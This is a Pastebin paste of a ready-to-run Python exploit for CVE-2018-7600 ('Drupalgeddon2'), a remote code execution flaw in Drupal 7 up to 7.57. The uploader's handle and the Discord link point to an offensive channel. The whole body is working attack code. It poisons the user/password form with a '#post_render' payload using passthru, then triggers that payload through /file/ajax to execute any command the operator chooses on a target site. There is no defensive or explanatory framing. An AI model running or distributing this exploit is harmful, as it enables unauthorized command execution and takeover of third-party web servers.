SHARE
TWEET

[PYTHON3]DRUPAL 7 EXPLOIT - LOADER

xB4ckdoorREAL Nov 4th, 2018 169 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #DISCORD : https://discord.gg/PTW3yPp
  2.  
  3. #!/usr/bin/env python3
  4.  
  5. import requests
  6. import argparse
  7. from bs4 import BeautifulSoup
  8.  
  9. def get_args():
  10.   parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
  11.                     formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
  12.                     epilog= '''
  13.                    This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
  14.                    by poisoning the recover password form (user/password) and triggering it with
  15.                    the upload file via ajax (/file/ajax).
  16.                    ''')
  17.   parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  18.   parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  19.   parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  20.   parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  21.   args = parser.parse_args()
  22.   return args
  23.  
  24. def pwn_target(target, function, command, proxy):
  25.   requests.packages.urllib3.disable_warnings()
  26.   proxies = {'http': proxy, 'https': proxy}
  27.   print('[*] Poisoning a form and including it in cache.')
  28.   get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
  29.   post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
  30.   r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  31.   soup = BeautifulSoup(r.text, "html.parser")
  32.   try:
  33.     form = soup.find('form', {'id': 'user-pass'})
  34.     form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
  35.     if form_build_id:
  36.         print('[*] Poisoned form ID: ' + form_build_id)
  37.         print('[*] Triggering exploit to execute: ' + command)
  38.         get_params = {'q':'file/ajax/name/#value/' + form_build_id}
  39.         post_params = {'form_build_id':form_build_id}
  40.         r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
  41.         parsed_result = r.text.split('[{"command":"settings"')[0]
  42.         print(parsed_result)
  43.   except:
  44.     print("ERROR: Something went wrong.")
  45.     raise
  46.  
  47. def main():
  48.   print ()
  49.   print ('=============================================================================')
  50.   print ('|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |')
  51.   print ('|                              by pimps                                     |')
  52.   print ('=============================================================================\n')
  53.  
  54.   args = get_args() # get the cl args
  55.   pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
  56.  
  57.  
  58. if __name__ == '__main__':
  59.   main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top